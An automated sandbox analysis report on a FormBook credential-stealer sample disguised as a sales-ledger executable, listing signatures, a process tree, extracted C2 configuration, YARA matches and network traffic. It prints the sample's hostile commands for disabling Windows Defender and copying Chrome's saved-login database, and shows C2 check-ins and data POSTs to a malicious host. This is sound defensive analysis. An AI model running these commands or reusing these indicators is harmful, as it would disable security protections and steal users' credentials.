Analysis Report Require your Sales Ledger from 01-April-2020.exe

Overview

General Information

Sample Name: Require your Sales Ledger from 01-April-2020.exe
Analysis ID: 385451
MD5: c7c27e1859f1593aedb1eebf0a15175e
SHA1: deb5544c037a7757462afab46ae2ca14a8f7f945
SHA256: d7e71646c9427067e810e1b278beb6ad1f07e6b0c5003d9be2611178e4f5470c
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Yara detected Costura Assembly Loader
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Require your Sales Ledger from 01-April-2020.exe (PID: 5792 cmdline: 'C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe' MD5: C7C27E1859F1593AEDB1EEBF0A15175E)
    • AdvancedRun.exe (PID: 2644 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6200 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • conhost.exe (PID: 3468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AdvancedRun.exe (PID: 6332 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 7124 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 2420 cmdline: 'powershell' Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Require your Sales Ledger from 01-April-2020.exe (PID: 6300 cmdline: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe MD5: C7C27E1859F1593AEDB1EEBF0A15175E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6856 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 2644 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.consultoramulticars.com/suod/"], "decoy": ["ynyshs.com", "freethegameboy.info", "mpsaklera.com", "neverlunar.icu", "coffeegoeth.com", "your-card.net", "rmcorredores.com", "binaconsa.com", "themovingmountains.com", "payalbansalinteriordesign.com", "dglala.com", "bettermelifestyle.com", "catnipny.com", "wwwpinxixi.com", "41dongbu.com", "fsdhgfdhkjgfhgsdf.com", "maemarienaturally.com", "1rugbycoachblog.com", "yax53.com", "vv4065.com", "gokcensesli.com", "huangshewangzhan.com", "ubiqshop.com", "therealfeelbeauty.net", "gotanie.com", "magentos6.com", "dektebopdtdl.support", "balabala.run", "skmagicjiksoohalawati.com", "systemandsystems.com", "theprismaticbody.com", "admiralsecuritysolutions.com", "seguro123.com", "uniquetips.net", "benugo-online.com", "domentemenegi24.com", "wisepinch.com", "wujinglingwudao.com", "teachmehowtomortgage.com", "prime-living.wien", "cancelrockethomes.com", "magickennels.info", "fytsky.com", "hyeonjin.net", "cecisgiftstore.com", "bikinibut.com", "laurakonner.com", "pissedoffpainters.com", "colec2c.com", "africandirectors.com", "criss-nutricionymakeup.com", "mathwithprofessorpi.com", "soretyje.com", "sellingparadiseproperties.com", "pinscan1502.com", "lifeunscriptedfilms.com", "alhula.com", "slutdating.online", "sofiadumonde.com", "dasanyang995.com", "fit2x.com", "seniorlivingcaelderly.com", "21stglobalequipments.com", "xiamencapital.com"]}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
Require your Sales Ledger from 01-April-2020.exe | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18429:$sqlite3step: 68 34 1C 7B E1
  • 0x1853c:$sqlite3step: 68 34 1C 7B E1
  • 0x18458:$sqlite3text: 68 38 2A 90 C5
  • 0x1857d:$sqlite3text: 68 38 2A 90 C5
  • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
0.0.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b71a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17629:$sqlite3step: 68 34 1C 7B E1
  • 0x1773c:$sqlite3step: 68 34 1C 7B E1
  • 0x17658:$sqlite3text: 68 38 2A 90 C5
  • 0x1777d:$sqlite3text: 68 38 2A 90 C5
  • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
24.0.Require your Sales Ledger from 01-April-2020.exe.710000.0.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security

Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started | Author: Joe Security | Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmmon32.exe, ParentImage: C:\Windows\SysWOW64\cmmon32.exe, ParentProcessId: 6856, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 2644

Signature Overview

AV Detection:

Found malware configuration
Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe | ReversingLabs: Detection: 29%
Multi AV Scanner detection for submitted file
Source: Require your Sales Ledger from 01-April-2020.exe | ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match | File source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Require your Sales Ledger from 01-April-2020.exe | Joe Sandbox ML: detected
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Require your Sales Ledger from 01-April-2020.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: Require your Sales Ledger from 01-April-2020.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe, 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000A.00000000.281364076.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr
Source: Binary string: cmmon32.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp
Source: Binary string: cmmon32.pdbGCTL source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.375057704.00000000012EF000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Require your Sales Ledger from 01-April-2020.exe, cmmon32.exe
Source: Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe | Code function: 4x nop then pop ebx | 24_2_00407B02
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe | Code function: 4x nop then pop edi | 24_2_00416CB0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop ebx | 32_2_02B17B02
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop edi | 32_2_02B26CBF

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 185.53.179.90:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 185.53.179.90:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 185.53.179.90:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.consultoramulticars.com/suod/
Source: global traffic | HTTP traffic detected: GET /suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3 HTTP/1.1 | Host: www.seniorlivingcaelderly.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Source: global traffic | HTTP traffic detected: POST /suod/ HTTP/1.1 | Host: www.seniorlivingcaelderly.com | Connection: close | Content-Length: 409 | Cache-Control: no-cache | Origin: http://www.seniorlivingcaelderly.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.seniorlivingcaelderly.com/suod/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /suod/ HTTP/1.1 | Host: www.seniorlivingcaelderly.com | Connection: close | Content-Length: 170153 | Cache-Control: no-cache | Origin: http://www.seniorlivingcaelderly.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.seniorlivingcaelderly.com/suod/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: C:\Windows\explorer.exe | Code function: 25_2_061C67C2 getaddrinfo,setsockopt,recv | 25_2_061C67C2
Source: unknown | DNS traffic detected: queries for: www.seniorlivingcaelderly.com
Source: unknown | HTTP traffic detected: POST /suod/ HTTP/1.1 | Host: www.seniorlivingcaelderly.com | Connection: close | Content-Length: 409 | Cache-Control: no-cache | Origin: http://www.seniorlivingcaelderly.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.seniorlivingcaelderly.com/suod/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: explorer.exe, 00000019.00000000.349774799.0000000008A2E000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr | String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icogk
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.coml1
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comti
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.241708507.0000000005871000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnto
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmcP
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp, Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/(i
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-cz
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-czti
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Bi)
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Pi
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0e
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0ftYi
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Yi
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/d.
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/fi
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/5i
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Pi
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/fi
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/q
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/q
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s20
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
